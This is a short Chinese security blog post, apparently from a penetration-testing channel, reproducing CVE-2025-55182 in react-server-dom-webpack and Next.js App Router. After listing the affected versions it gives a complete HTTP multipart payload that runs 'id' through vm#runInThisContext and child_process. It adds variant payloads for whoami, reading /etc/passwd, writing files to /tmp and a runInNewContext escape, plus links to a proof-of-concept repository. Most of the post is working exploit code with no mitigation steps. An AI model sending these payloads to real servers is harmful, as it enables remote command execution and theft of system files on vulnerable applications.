大数跨境
0
0

大洞速修,已复现CVE-2025-55182

大洞速修,已复现CVE-2025-55182 知攻善防实验室
2025-12-04
1
导读:几乎所有 Next.js 应用都使用了包含 fs 的包,真大洞!

几乎所有 Next.js 应用都使用了包含 fs 的包,真大洞!

受影响版本

react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0

Next.js: 15.x, 16.x (App Router)

复现环境
图片
复现环境运行
npm installnode --conditions react-server --conditions webpack src/server.js
没有安装 node.js自行安装一下
复现数据包:POST /formaction HTTP/1.1Host: localhost:3002Content-Type: multipart/form-data; boundary=----BoundaryContent-Length297------BoundaryContent-Disposition: form-data; name="$ACTION_REF_0"------BoundaryContent-Disposition: form-data; name="$ACTION_0:0"{"id":"vm#runInThisContext","bound":["global.process.mainModule.require(\"child_process\").execSync(\"id\").toString()"]}------Boundary--
其他变种
id'child_process#execSync', bound: ['whoami'] }id'fs#readFileSync', bound: ['/etc/passwd'] }id'fs#writeFileSync', bound: ['/tmp/pwned.txt''CVE-2025-55182'] }{  id'vm#runInThisContext',  bound: ['process.mainModule.require("child_process").execSync("id").toString()']}{  id'vm#runInNewContext',  bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString()']}
复现环境下载:
https://github.com/ejpir/CVE-2025-55182-poc/https://pan.quark.cn/s/d72c76a455c5


CISP、NISP、CISP-PTE 等安全证书考证+Admin_Ran


【声明】内容源于网络
0
0
知攻善防实验室
红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。
内容 271
粉丝 0
知攻善防实验室 红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。
总阅读37
粉丝0
内容271